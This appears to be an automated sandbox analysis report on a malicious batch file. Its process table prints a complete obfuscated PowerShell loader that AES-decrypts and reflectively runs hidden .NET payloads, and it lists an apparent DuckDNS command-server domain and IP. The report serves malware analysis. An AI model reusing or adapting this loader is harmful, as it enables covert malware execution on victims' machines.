Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
b.cmd
|
ASCII text, with very long lines (29358), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ojf2mp0.mqs.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_laz5iitu.x1c.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scsfgjn1.nho.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xaksudmg.0xf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with very long lines (2117), with CRLF line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\b.cmd" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c \"set __=^&rem\
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\b.cmd"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c \"set __=^&rem\
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\b.cmd';$rWNT='DecpxHCopxHCmppxHCrespxHCspxHC'.Replace('pxHC',
''),'MaTGyrinTGyrMTGyroTGyrdTGyrulTGyreTGyr'.Replace('TGyr', ''),'CrYsKteYsKtateYsKtDYsKteYsKtcrYsKtypYsKttoYsKtrYsKt'.Replace('YsKt',
''),'Idnlzndnlzvdnlzokdnlzednlz'.Replace('dnlz', ''),'TraGoiknsfGoikoGoikrmFGoikinaGoiklBlGoikockGoik'.Replace('Goik', ''),'LoStkNadStkN'.Replace('StkN',
''),'FroMxWcmBaMxWcse6MxWc4StMxWcriMxWcngMxWc'.Replace('MxWc', ''),'EnrgYjtrrgYjyrgYjPorgYjinrgYjtrgYj'.Replace('rgYj', ''),'CqJGUopqJGUyqJGUTqJGUoqJGU'.Replace('qJGU',
''),'ElywTEeywTEmenywTEtAywTEtywTE'.Replace('ywTE', ''),'ReaMpXgdLMpXgineMpXgsMpXg'.Replace('MpXg', ''),'CeuHLheuHLangeuHLeExeuHLteeuHLnseuHLioneuHL'.Replace('euHL',
''),'SKlTEpliKlTEtKlTE'.Replace('KlTE', ''),'GzasmetzasmCuzasmrrzasmentzasmPrzasmocezasmszasmszasm'.Replace('zasm', '');powershell
-w hidden;function OgEIm($Xyfkn){$KStrb=[System.Security.Cryptography.Aes]::Create();$KStrb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KStrb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KStrb.Key=[System.Convert]::($rWNT[6])('xA1+WTJaPCUsOeL/aM8gYjpdFXCHAzsSe7O9jqgG6tE=');$KStrb.IV=[System.Convert]::($rWNT[6])('o+k4tdVDsXdevRbseXqo5Q==');$OoABI=$KStrb.($rWNT[2])();$gCRFY=$OoABI.($rWNT[4])($Xyfkn,0,$Xyfkn.Length);$OoABI.Dispose();$KStrb.Dispose();$gCRFY;}function
bkQvC($Xyfkn){$pXxPg=New-Object System.IO.MemoryStream(,$Xyfkn);$ztkwM=New-Object System.IO.MemoryStream;$RxDER=New-Object
System.IO.Compression.GZipStream($pXxPg,[IO.Compression.CompressionMode]::($rWNT[0]));$RxDER.($rWNT[8])($ztkwM);$RxDER.Dispose();$pXxPg.Dispose();$ztkwM.Dispose();$ztkwM.ToArray();}$QaWhK=[System.IO.File]::($rWNT[10])([Console]::Title);$TOEth=bkQvC
(OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 5).Substring(2))));$kobGz=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK,
6).Substring(2))));[System.Reflection.Assembly]::($rWNT[5])([byte[]]$kobGz).($rWNT[7]).($rWNT[3])($null,$null);[System.Reflection.Assembly]::($rWNT[5])([byte[]]$TOEth).($rWNT[7]).($rWNT[3])($null,$null);
"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.apache.o
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 5 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
dcxwq1.duckdns.org
|
101.99.92.203
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
101.99.92.203
|
dcxwq1.duckdns.org
|
Malaysia
|
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
664F47E000
|
stack
|
page read and write
|
||
|
1FCA7710000
|
heap
|
page execute and read and write
|
||
|
1FCA780B000
|
trusted library allocation
|
page read and write
|
||
|
1FCBF8F9000
|
heap
|
page read and write
|
||
|
1FCA7781000
|
trusted library allocation
|
page read and write
|
||
|
1FCA5958000
|
heap
|
page read and write
|
||
|
664F8BB000
|
stack
|
page read and write
|
||
|
1FCA592B000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
1FCA5800000
|
heap
|
page read and write
|
||
|
1FCA7CC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
665028E000
|
stack
|
page read and write
|
||
|
664F7BE000
|
stack
|
page read and write
|
||
|
1FCBF8C0000
|
heap
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
1FCA5860000
|
heap
|
page read and write
|
||
|
664F53F000
|
stack
|
page read and write
|
||
|
1FCA5956000
|
heap
|
page read and write
|
||
|
7FFD9B674000
|
trusted library allocation
|
page read and write
|
||
|
1FCA9155000
|
trusted library allocation
|
page read and write
|
||
|
664F83E000
|
stack
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B720000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B852000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B821000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
1FCA5B68000
|
heap
|
page read and write
|
||
|
1FCA8BD4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page execute and read and write
|
||
|
664EF5E000
|
unkown
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
665030E000
|
stack
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
1FCBF948000
|
heap
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
1FCB7943000
|
trusted library allocation
|
page read and write
|
||
|
664F6B8000
|
stack
|
page read and write
|
||
|
7FFD9B690000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
664F37E000
|
stack
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
664F5B7000
|
stack
|
page read and write
|
||
|
1FCA5914000
|
heap
|
page read and write
|
||
|
664F27E000
|
stack
|
page read and write
|
||
|
7FFD9B72C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FCA7740000
|
heap
|
page execute and read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
1FCA7667000
|
heap
|
page execute and read and write
|
||
|
1FCBFBA0000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
1FCA7660000
|
heap
|
page execute and read and write
|
||
|
1FCA5B10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B756000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FCA58E0000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
1FCA9159000
|
trusted library allocation
|
page read and write
|
||
|
1FCA5A06000
|
heap
|
page read and write
|
||
|
1FCA7BF6000
|
trusted library allocation
|
page read and write
|
||
|
1FCA5A08000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
1FCA58C0000
|
heap
|
page readonly
|
||
|
7FFD9B82A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B67D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FCA5B60000
|
heap
|
page read and write
|
||
|
664EFDE000
|
stack
|
page read and write
|
||
|
1FCA7B5D000
|
trusted library allocation
|
page read and write
|
||
|
1FCBF95B000
|
heap
|
page read and write
|
||
|
1FCBF8A2000
|
heap
|
page read and write
|
||
|
1FCA86C0000
|
trusted library allocation
|
page read and write
|
||
|
1FCBF8A0000
|
heap
|
page read and write
|
||
|
1FCB7790000
|
trusted library allocation
|
page read and write
|
||
|
1FCA57E0000
|
heap
|
page read and write
|
||
|
1FCA59E0000
|
heap
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
1FCB77F1000
|
trusted library allocation
|
page read and write
|
||
|
1FCA58B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
1FCA5AE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B69D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FCA7770000
|
heap
|
page read and write
|
||
|
1FCBF8C8000
|
heap
|
page read and write
|
||
|
7FFD9B680000
|
trusted library allocation
|
page read and write
|
||
|
664F63C000
|
stack
|
page read and write
|
||
|
1FCA5865000
|
heap
|
page read and write
|
||
|
1FCA597F000
|
heap
|
page read and write
|
||
|
1FCA59C5000
|
heap
|
page read and write
|
||
|
1FCBF8C5000
|
heap
|
page read and write
|
||
|
7FFD9B68B000
|
trusted library allocation
|
page read and write
|
||
|
1FCB77FD000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
1FCA7CBC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
1FCA58EB000
|
heap
|
page read and write
|
||
|
664F4F9000
|
stack
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
1FCBF8FB000
|
heap
|
page read and write
|
||
|
1FCBFBB0000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
1FCBF78F000
|
heap
|
page read and write
|
||
|
664F2FD000
|
stack
|
page read and write
|
||
|
1FCA8CB2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
7DF4AD940000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B670000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
1FCA793E000
|
trusted library allocation
|
page read and write
|
||
|
1FCB7A7A000
|
trusted library allocation
|
page read and write
|
||
|
1FCA9318000
|
trusted library allocation
|
page read and write
|
||
|
1FCA7A65000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B673000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FCBF8AE000
|
heap
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
1FCA5840000
|
heap
|
page read and write
|
||
|
7FFD9B6CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FCB7781000
|
trusted library allocation
|
page read and write
|
||
|
1FCB780D000
|
trusted library allocation
|
page read and write
|
||
|
1FCA9343000
|
trusted library allocation
|
page read and write
|
||
|
1FCBF989000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
664EED3000
|
stack
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FCA592E000
|
heap
|
page read and write
|
||
|
1FCA58D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
664F3FF000
|
stack
|
page read and write
|
||
|
1FCA5B65000
|
heap
|
page read and write
|
||
|
1FCA595D000
|
heap
|
page read and write
|
||
|
664F73E000
|
stack
|
page read and write
|
||
|
1FCA939E000
|
trusted library allocation
|
page read and write
|
||
|
1FCA5700000
|
heap
|
page read and write
|
||
|
1FCA5890000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B726000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B69B000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
There are 136 hidden memdumps, click here to show them.